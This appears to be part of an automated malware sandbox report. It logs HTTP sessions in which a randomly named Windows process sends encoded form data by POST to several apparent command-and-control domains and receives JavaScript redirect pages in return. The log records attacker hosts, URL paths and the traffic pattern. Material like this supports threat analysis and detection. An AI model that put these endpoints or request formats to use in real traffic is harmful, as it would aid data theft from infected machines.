                                                                                                                              Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              21192.168.2.6500143.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:54.257118940 CEST760OUTPOST /spso/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.booosted.xyz
                                                                                                                              Origin: http://www.booosted.xyz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.booosted.xyz/spso/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 67 48 32 6f 6a 57 42 34 73 71 67 4b 6f 71 6c 4b 37 4b 74 67 30 4c 42 2f 70 6c 78 64 64 7a 4c 74 31 4b 38 4e 44 45 6d 73 62 53 4f 43 46 41 39 30 78 6a 59 42 4e 65 4a 64 77 61 7a 4e 32 65 34 76 33 2b 45 38 71 30 55 53 4d 7a 58 59 4b 4a 78 66 46 42 65 4d 5a 75 6b 74 58 38 71 79 67 36 49 2b 67 6c 31 65 6c 4c 43 69 54 65 30 52 35 35 59 39 63 44 37 32 2b 44 6a 39 70 38 67 45 68 63 7a 35 45 46 4b 76 76 61 6d 4d 30 47 58 34 46 48 75 2b 6e 31 46 58 54 36 57 65 6f 72 38 32 79 39 75 70 2b 38 41 76 67 54 55 54 4a 75 55 57 50 61 64 52 6c 4d 66 71 2f 4c 45 52 74 4d 61 75 61 74 69 68 31 41 48 2b 55 78 2f 71 34 74 6c 70
                                                                                                                              Data Ascii: ej6Le=gH2ojWB4sqgKoqlK7Ktg0LB/plxddzLt1K8NDEmsbSOCFA90xjYBNeJdwazN2e4v3+E8q0USMzXYKJxfFBeMZuktX8qyg6I+gl1elLCiTe0R55Y9cD72+Dj9p8gEhcz5EFKvvamM0GX4FHu+n1FXT6Weor82y9up+8AvgTUTJuUWPadRlMfq/LERtMauatih1AH+Ux/q4tlp


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              22192.168.2.6500153.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:56.810563087 CEST784OUTPOST /spso/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.booosted.xyz
                                                                                                                              Origin: http://www.booosted.xyz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.booosted.xyz/spso/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 67 48 32 6f 6a 57 42 34 73 71 67 4b 71 4b 56 4b 36 71 52 67 7a 72 42 38 33 31 78 64 55 54 4b 6b 31 4c 41 4e 44 46 6a 7a 61 68 71 43 45 68 4e 30 6a 78 38 42 4b 65 4a 64 6b 4b 7a 4d 72 4f 34 30 33 2b 49 43 71 31 45 53 4d 33 2f 59 4b 4d 4e 66 51 6e 57 4e 59 2b 6b 34 4f 4d 71 77 74 61 49 2b 67 6c 31 65 6c 4c 57 45 54 65 73 52 35 70 49 39 65 69 37 31 39 44 6a 69 2b 4d 67 45 6c 63 7a 31 45 46 4c 49 76 66 2b 69 30 44 54 34 46 48 65 2b 70 45 46 51 4b 4b 57 51 6d 4c 39 48 6a 75 48 6d 78 4d 64 2f 6d 67 73 32 4a 74 55 2b 4b 73 63 4c 35 2f 66 4a 74 62 6b 54 74 4f 43 63 61 4e 69 4c 33 41 2f 2b 47 6d 7a 4e 33 5a 41 4b 5a 2b 6e 45 55 67 62 31 35 54 68 54 6c 39 70 64 4b 46 75 58 42 77 3d 3d
                                                                                                                              Data Ascii: ej6Le=gH2ojWB4sqgKqKVK6qRgzrB831xdUTKk1LANDFjzahqCEhN0jx8BKeJdkKzMrO403+ICq1ESM3/YKMNfQnWNY+k4OMqwtaI+gl1elLWETesR5pI9ei719Dji+MgElcz1EFLIvf+i0DT4FHe+pEFQKKWQmL9HjuHmxMd/mgs2JtU+KscL5/fJtbkTtOCcaNiL3A/+GmzN3ZAKZ+nEUgb15ThTl9pdKFuXBw==


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              23192.168.2.6500163.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:59.360426903 CEST1797OUTPOST /spso/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.booosted.xyz
                                                                                                                              Origin: http://www.booosted.xyz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.booosted.xyz/spso/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 67 48 32 6f 6a 57 42 34 73 71 67 4b 71 4b 56 4b 36 71 52 67 7a 72 42 38 33 31 78 64 55 54 4b 6b 31 4c 41 4e 44 46 6a 7a 61 68 69 43 46 58 5a 30 78 41 38 42 4c 65 4a 64 6e 4b 7a 4a 72 4f 34 31 33 2b 42 46 71 77 64 6e 4d 31 33 59 4a 71 35 66 42 31 2b 4e 53 2b 6b 34 54 38 71 7a 67 36 49 6e 67 6c 46 61 6c 4c 47 45 54 65 73 52 35 76 73 39 61 7a 37 31 37 44 6a 39 70 38 67 79 68 63 7a 52 45 46 54 79 76 66 79 63 30 77 62 34 43 6e 4f 2b 72 79 78 51 56 36 57 46 72 72 39 66 6a 75 61 6d 78 4d 42 7a 6d 68 59 4d 4a 76 49 2b 49 62 31 32 68 39 48 6b 2f 49 45 5a 71 5a 71 35 65 36 36 53 36 79 50 6e 4b 30 50 67 39 36 38 58 51 62 6e 46 47 78 7a 30 34 68 52 6b 37 4c 49 55 41 48 2f 2f 52 77 62 36 70 72 61 72 49 4d 30 50 37 4f 41 6b 56 69 41 36 74 70 54 32 35 66 36 32 55 6a 34 70 6b 4f 72 76 78 79 31 4d 61 4d 61 72 39 52 6a 70 62 32 47 6b 32 77 7a 65 4e 57 2b 65 66 38 56 6c 79 51 47 38 37 62 5a 52 52 4f 7a 4f 64 42 2f 47 6d 73 59 78 49 71 56 65 54 4f 35 4e 44 41 4b 51 69 33 72 31 54 44 2f 7a 66 48 65 6e [TRUNCATED]
                                                                                                                              Data Ascii: ej6Le=gH2ojWB4sqgKqKVK6qRgzrB831xdUTKk1LANDFjzahiCFXZ0xA8BLeJdnKzJrO413+BFqwdnM13YJq5fB1+NS+k4T8qzg6InglFalLGETesR5vs9az717Dj9p8gyhczREFTyvfyc0wb4CnO+ryxQV6WFrr9fjuamxMBzmhYMJvI+Ib12h9Hk/IEZqZq5e66S6yPnK0Pg968XQbnFGxz04hRk7LIUAH//Rwb6prarIM0P7OAkViA6tpT25f62Uj4pkOrvxy1MaMar9Rjpb2Gk2wzeNW+ef8VlyQG87bZRROzOdB/GmsYxIqVeTO5NDAKQi3r1TD/zfHen68ccDlW/9DSH6prDnObvSrwg668gGCSriO3t6EzXzGl4XEmUi3vAe1ZhrJn8/wh2X1R1lg3zZjs3g1sOttFXzBUXFyhnDBPXT928qZMFuT6q9NmpVOGW6B4k+BICCBMOa6Y4rde2N5z9OGZ2F6miiwr/13uQHKuevLo4U+TU7aDnx382Az993uy9EE5JTuc5mRu37cS81mfMFELQzgS4AA8LOESJBn2Hgd0Gw0IyzoXW4AsEa3tYtg9cXScap565zoQrg8tvI/j1vzc3tNnsCwx6RZOYJEmcdcSLcnbnYLOyqup/uU7t5voLQHCC1EsH6aeiqL1y7LVXbBJlbHA6I6CMB3CoVDIZynhiPunUbBxTcsshRB45qNLixShFBF7wFn/W+QM3Yt5f+SMDdLqtFS/zBli/Pij9+APtj9x87l+S7sJzyoFScmQpWAuCISpBEk1lC95lPIAoxdzV17SOKqz25I3to4Qn5VRIszBzvGKhfXZI/GA3+6IWGXjSEztyaGbrAepP6YxQMZVJkPO2U9SCJmpY0mSaOnlaTFblk3NtbhY6nQTqPf+U8OroDzfCE23DnNC0Oi3pIFY4UJS61Hb75bxRHskeUNr514eaaBDjOMNE8YNhPHQUvqMK4G41yAunXDWogYzXWXj8QYL2PxUQbfzV3+xys5 [TRUNCATED]


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              24192.168.2.6500173.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:02.059458017 CEST504OUTGET /spso/?ej6Le=tFeIgmxzndAX18VLtJk/zbNv0lImNRb288p8UUCUbjDyDydKnVlzDYJug8WZqOAMxfoP9GMdNXzPVq95XWLVPrBzbN/BvIU7kFB3pLyGJrR2t8RTUX3UsiymoOhQ+PD/dlbX4PM=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.booosted.xyz
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:35:02.512428999 CEST413INHTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:02 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 273
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 6a 36 4c 65 3d 74 46 65 49 67 6d 78 7a 6e 64 41 58 31 38 56 4c 74 4a 6b 2f 7a 62 4e 76 30 6c 49 6d 4e 52 62 32 38 38 70 38 55 55 43 55 62 6a 44 79 44 79 64 4b 6e 56 6c 7a 44 59 4a 75 67 38 57 5a 71 4f 41 4d 78 66 6f 50 39 47 4d 64 4e 58 7a 50 56 71 39 35 58 57 4c 56 50 72 42 7a 62 4e 2f 42 76 49 55 37 6b 46 42 33 70 4c 79 47 4a 72 52 32 74 38 52 54 55 58 33 55 73 69 79 6d 6f 4f 68 51 2b 50 44 2f 64 6c 62 58 34 50 4d 3d 26 41 6e 3d 6d 4c 64 78 6f 32 59 38 52 4c 52 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ej6Le=tFeIgmxzndAX18VLtJk/zbNv0lImNRb288p8UUCUbjDyDydKnVlzDYJug8WZqOAMxfoP9GMdNXzPVq95XWLVPrBzbN/BvIU7kFB3pLyGJrR2t8RTUX3UsiymoOhQ+PD/dlbX4PM=&An=mLdxo2Y8RLRh"}</script></head></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              25192.168.2.6500193.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:07.561130047 CEST790OUTPOST /8blm/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.gegeesthreadworks.info
                                                                                                                              Origin: http://www.gegeesthreadworks.info
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.gegeesthreadworks.info/8blm/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 4b 51 44 42 39 53 68 2b 79 61 76 6b 66 55 2f 41 76 75 39 56 79 5a 47 54 66 33 7a 64 53 33 61 55 2f 5a 6e 36 63 48 6c 73 51 30 6c 6b 47 31 58 56 68 5a 51 50 57 53 66 79 72 50 4a 78 57 54 57 74 6a 50 57 39 47 7a 74 57 61 76 70 38 76 6d 6e 61 78 38 78 47 46 31 4c 43 72 2b 48 66 32 70 43 39 6b 56 58 7a 59 64 63 37 69 37 62 42 55 62 49 34 69 57 2f 45 6d 6b 67 70 4d 35 50 30 33 56 32 58 78 55 61 37 4b 71 50 58 65 70 74 74 35 4c 77 7a 50 56 73 68 36 61 33 34 55 30 6d 6d 47 30 41 6f 78 6f 4e 63 73 36 6e 76 33 44 39 35 7a 35 76 46 31 49 39 45 6b 4a 6e 6c 76 54 38 43 54 44 37 63 31 4e 52 47 39 54 63 77 66 43 4a 4a
                                                                                                                              Data Ascii: ej6Le=KQDB9Sh+yavkfU/Avu9VyZGTf3zdS3aU/Zn6cHlsQ0lkG1XVhZQPWSfyrPJxWTWtjPW9GztWavp8vmnax8xGF1LCr+Hf2pC9kVXzYdc7i7bBUbI4iW/EmkgpM5P03V2XxUa7KqPXeptt5LwzPVsh6a34U0mmG0AoxoNcs6nv3D95z5vF1I9EkJnlvT8CTD7c1NRG9TcwfCJJ


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              26192.168.2.6500203.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:10.107423067 CEST814OUTPOST /8blm/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.gegeesthreadworks.info
                                                                                                                              Origin: http://www.gegeesthreadworks.info
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.gegeesthreadworks.info/8blm/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 4b 51 44 42 39 53 68 2b 79 61 76 6b 66 30 76 41 38 66 39 56 6a 70 47 51 47 33 7a 64 63 58 61 49 2f 5a 6a 36 63 46 49 33 51 6e 42 6b 47 52 66 56 6d 74 4d 50 52 53 66 79 68 76 4a 30 62 7a 57 71 6a 50 54 65 47 7a 52 57 61 76 39 38 76 6d 33 61 78 4e 78 5a 44 31 4c 41 7a 4f 48 64 72 35 43 39 6b 56 58 7a 59 64 59 64 69 34 72 42 55 72 55 34 77 43 72 46 34 55 67 75 46 5a 50 30 68 6c 32 54 78 55 62 73 4b 76 76 35 65 72 46 74 35 4a 6f 7a 50 41 4d 69 77 61 33 2b 4a 45 6d 77 4b 45 64 32 70 4a 46 59 76 5a 7a 63 6b 43 68 59 2f 76 75 66 70 37 39 6e 32 5a 48 6e 76 52 6b 77 54 6a 37 32 33 4e 70 47 76 45 51 58 51 32 73 71 42 72 63 51 55 73 67 4a 5a 36 4c 64 48 49 33 64 53 32 6e 64 39 41 3d 3d
                                                                                                                              Data Ascii: ej6Le=KQDB9Sh+yavkf0vA8f9VjpGQG3zdcXaI/Zj6cFI3QnBkGRfVmtMPRSfyhvJ0bzWqjPTeGzRWav98vm3axNxZD1LAzOHdr5C9kVXzYdYdi4rBUrU4wCrF4UguFZP0hl2TxUbsKvv5erFt5JozPAMiwa3+JEmwKEd2pJFYvZzckChY/vufp79n2ZHnvRkwTj723NpGvEQXQ2sqBrcQUsgJZ6LdHI3dS2nd9A==


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              27192.168.2.6500213.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:12.658299923 CEST1827OUTPOST /8blm/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.gegeesthreadworks.info
                                                                                                                              Origin: http://www.gegeesthreadworks.info
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.gegeesthreadworks.info/8blm/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 4b 51 44 42 39 53 68 2b 79 61 76 6b 66 30 76 41 38 66 39 56 6a 70 47 51 47 33 7a 64 63 58 61 49 2f 5a 6a 36 63 46 49 33 51 6e 4a 6b 47 47 66 56 68 36 34 50 51 53 66 79 2f 2f 4a 31 62 7a 57 37 6a 4c 2f 43 47 7a 63 30 61 73 46 38 2b 77 37 61 7a 2f 4a 5a 51 56 4c 41 76 2b 48 63 32 70 44 33 6b 56 47 36 59 64 6f 64 69 34 72 42 55 70 67 34 7a 57 2f 46 36 55 67 70 4d 35 50 6f 33 56 32 33 78 55 53 5a 4b 76 6a 48 65 62 6c 74 35 71 51 7a 4a 30 73 69 71 61 33 38 49 45 6e 7a 4b 45 52 58 70 4a 49 6a 76 61 76 6c 6b 41 39 59 2f 70 72 6f 2b 61 42 76 6c 4b 48 69 2b 51 55 74 66 56 37 38 35 66 39 33 70 55 73 37 4f 33 63 59 48 2b 39 50 65 75 59 4f 4f 35 72 74 44 4f 61 56 54 55 4b 4f 73 78 73 2b 37 59 70 36 47 31 67 47 48 75 68 64 68 56 6a 4d 57 2f 34 4c 2b 69 31 6a 46 38 58 75 6b 5a 34 42 36 31 61 4c 53 74 65 64 77 4b 4e 70 7a 37 2f 66 6d 56 65 4a 44 49 68 4e 71 70 4b 65 72 38 47 4d 37 5a 64 65 65 58 43 46 42 45 56 4b 42 6d 41 75 79 41 53 55 6b 6e 30 65 77 6f 77 47 6a 39 70 79 30 4c 44 74 4a 2b 55 58 [TRUNCATED]
                                                                                                                              Data Ascii: ej6Le=KQDB9Sh+yavkf0vA8f9VjpGQG3zdcXaI/Zj6cFI3QnJkGGfVh64PQSfy//J1bzW7jL/CGzc0asF8+w7az/JZQVLAv+Hc2pD3kVG6Ydodi4rBUpg4zW/F6UgpM5Po3V23xUSZKvjHeblt5qQzJ0siqa38IEnzKERXpJIjvavlkA9Y/pro+aBvlKHi+QUtfV785f93pUs7O3cYH+9PeuYOO5rtDOaVTUKOsxs+7Yp6G1gGHuhdhVjMW/4L+i1jF8XukZ4B61aLStedwKNpz7/fmVeJDIhNqpKer8GM7ZdeeXCFBEVKBmAuyASUkn0ewowGj9py0LDtJ+UXd0E+Bg6JWeT7aU4XSPMUhVN43pUMbOB8/8LXZDlsTSDycyMu6kOmUtDscAokAgs0kzGHytUsOPENaWXfir0koF1sXbVXJBNmfBvKq0ulJiMuwsAEtV5d48UAP0phfjy9Lyd9KYQXfLA1zgv3yd0KmL0nspR+M8XcDsC8mS/SXDusk4d/F7sPwz6JmuIHVV4XIlTWqBhBtzoFUPt/T9BjRmtbVeLZ9LoRaLXlwbIE2Avo82JD9XjhAtxbsZ93nn8n9gf/9He25hK4WgKmBs9uUddynA5Z9FnY+ekj2+uNxNEdleJV179ZizN35uAcFQnUsbZ2PheuP7hgLm0cpRetvsEnEwDsqa987ZmNygVwHdasGCPlkvIV1v8zKuEgMN+0JVK0NYn8/jlwIpIr/dY8G0mfLK3rMpSI/U9LNJrVKMowwpDXOxfwwAOUxid4XVI3zqnl3OII4/BB8rQCkxtrEYtKJ1Taygkk4JOn20443DumxvWEa/DYHkhRK0FDdTIGWS1NdyS9CTZX4g3ZBWBHdmSxoeopOf1UNVAVurifAsfrYNRPcxqzMKm6ZaEQWtdEYj4zS3P7ZCw2AhqqqpfT7wolL8S2Ow8Fu5aA+reVpDqbhnBwSr7/v+e3vE4YIWoVzI6bqK2tzK5qN6os3nX9tOZmaKvM23tkHZ [TRUNCATED]


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              28192.168.2.6500223.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:15.202512026 CEST514OUTGET /8blm/?ej6Le=HSrh+kNg29vzDhmFvPtm7umcbnSkD02Ywpq4W1dSB1gaYliK2tVtZVmlspEFfRCsj7T0RA4zUvJ1xW3xieZGFm3Omt7rhJzIl1qpMMAhzN+EcK1k2mGj+1ZxR4qvhmW1pUGTA/Y=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.gegeesthreadworks.info
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:35:15.652370930 CEST413INHTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:15 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 273
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 6a 36 4c 65 3d 48 53 72 68 2b 6b 4e 67 32 39 76 7a 44 68 6d 46 76 50 74 6d 37 75 6d 63 62 6e 53 6b 44 30 32 59 77 70 71 34 57 31 64 53 42 31 67 61 59 6c 69 4b 32 74 56 74 5a 56 6d 6c 73 70 45 46 66 52 43 73 6a 37 54 30 52 41 34 7a 55 76 4a 31 78 57 33 78 69 65 5a 47 46 6d 33 4f 6d 74 37 72 68 4a 7a 49 6c 31 71 70 4d 4d 41 68 7a 4e 2b 45 63 4b 31 6b 32 6d 47 6a 2b 31 5a 78 52 34 71 76 68 6d 57 31 70 55 47 54 41 2f 59 3d 26 41 6e 3d 6d 4c 64 78 6f 32 59 38 52 4c 52 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ej6Le=HSrh+kNg29vzDhmFvPtm7umcbnSkD02Ywpq4W1dSB1gaYliK2tVtZVmlspEFfRCsj7T0RA4zUvJ1xW3xieZGFm3Omt7rhJzIl1qpMMAhzN+EcK1k2mGj+1ZxR4qvhmW1pUGTA/Y=&An=mLdxo2Y8RLRh"}</script></head></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              29192.168.2.650023209.74.64.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:21.363176107 CEST763OUTPOST /dbaa/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.sellvolt.life
                                                                                                                              Origin: http://www.sellvolt.life
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.sellvolt.life/dbaa/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 70 38 65 42 2b 4a 58 4c 2b 71 5a 6f 50 59 48 6f 6e 4f 50 31 4e 66 32 51 4a 56 6a 43 6e 35 54 52 6f 4a 4c 49 51 71 71 6f 75 39 44 78 59 5a 49 4a 6e 71 42 56 78 4c 74 77 48 4e 7a 77 52 6a 42 42 39 6f 51 33 6d 4e 38 54 4a 4f 45 53 52 50 50 79 53 78 62 47 4b 38 34 76 36 76 2b 38 49 65 44 69 69 74 5a 54 34 77 35 37 51 48 6c 69 65 39 47 7a 30 55 6a 61 75 6d 61 65 39 53 62 53 41 58 37 37 4c 30 65 47 47 67 54 77 4c 6c 4c 6d 59 2b 49 69 64 35 32 76 31 4b 73 59 61 4d 55 68 76 6c 4f 50 6f 2f 74 58 42 61 6c 4c 59 48 64 63 55 53 42 77 43 66 53 35 43 78 49 6b 74 37 31 6e 2b 74 5a 62 49 32 39 78 78 59 64 45 46 67 4b 71
                                                                                                                              Data Ascii: ej6Le=p8eB+JXL+qZoPYHonOP1Nf2QJVjCn5TRoJLIQqqou9DxYZIJnqBVxLtwHNzwRjBB9oQ3mN8TJOESRPPySxbGK84v6v+8IeDiitZT4w57QHlie9Gz0Ujaumae9SbSAX77L0eGGgTwLlLmY+Iid52v1KsYaMUhvlOPo/tXBalLYHdcUSBwCfS5CxIkt71n+tZbI29xxYdEFgKq
                                                                                                                              Oct 7, 2024 12:35:21.938657999 CEST533INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:21 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
